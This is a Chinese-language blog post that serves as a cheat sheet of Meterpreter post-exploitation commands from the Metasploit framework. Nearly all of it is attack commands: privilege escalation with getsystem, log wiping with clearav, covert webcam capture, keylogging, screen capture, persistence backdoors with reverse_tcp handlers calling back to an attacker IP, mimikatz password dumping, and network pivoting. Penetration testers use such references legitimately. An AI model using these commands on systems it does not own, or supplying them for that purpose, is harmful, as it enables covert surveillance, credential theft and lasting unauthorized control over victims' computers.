Meterpreter常用命令

发布于 2020-01-19  546 次阅读


0x01 简介

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

0x02 命令

shell            #进入cmd终端命令窗口
ps               #查看当前进程
getuid           #查看当前权限
getpid           #查看当前在哪个pid进程
getsystem        #通过各种攻击向量将一个管理帐户提升为本地SYSTEM帐户
idletime         #查看目标空闲时间
sysinfo          #查看目标系统信息
background       #把当前会话放置后台
migrate [pid值]  #迁移进程
kill [pid值]     #结束目标进程
clearav          #清理日志
ipconfig/ifconfig   #查看网络信息
reboot           #重启目标电脑
shutdown         #关闭目标电脑

0x03 查看摄像头

webcam_list     #查看目标摄像头
webcam_snap     #通过目标摄像头拍照
webcam_stream   #查看目标摄像头实时画面

0x04 记录键盘

keyscan_start     #开启键盘记录功能
keyscan_dump      #显示捕捉到的键盘记录信息
keyscan_stop      #停止键盘记录功能

0x05 捕捉屏幕

screenshot   #截取目标屏幕保存到本地
screenshare  #实时查看目标屏幕
run vnc      #实时查看目标屏幕

0x06 植入后门

1.Persistence
run persistence -X -i 5 -p 4444 -r 192.168.26.134
#-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip
#连接后门
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 192.168.26.134
msf > set lport 4444
msf > run
2.metsvc
run  metsvc
#连接后门
msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set rhost 192.168.26.134
msf > set lport 31337
msf > run

0x07 mimikatz获取密码

load mimikatz    #加载 mimikatz模块
wdigest          #获取Wdigest密码
mimikatz_command -f samdump::hashes  #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords

0x08 添加路由

run autoroute –h #查看帮助
run autoroute -s 192.168.26.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由

0x09 portfwd 端口转发

portfwd add -l 1234 -p 3389 -r 127.0.0.1 #将目标的3389端口转发到本地1234端口

我不懂世界到底在热闹些什么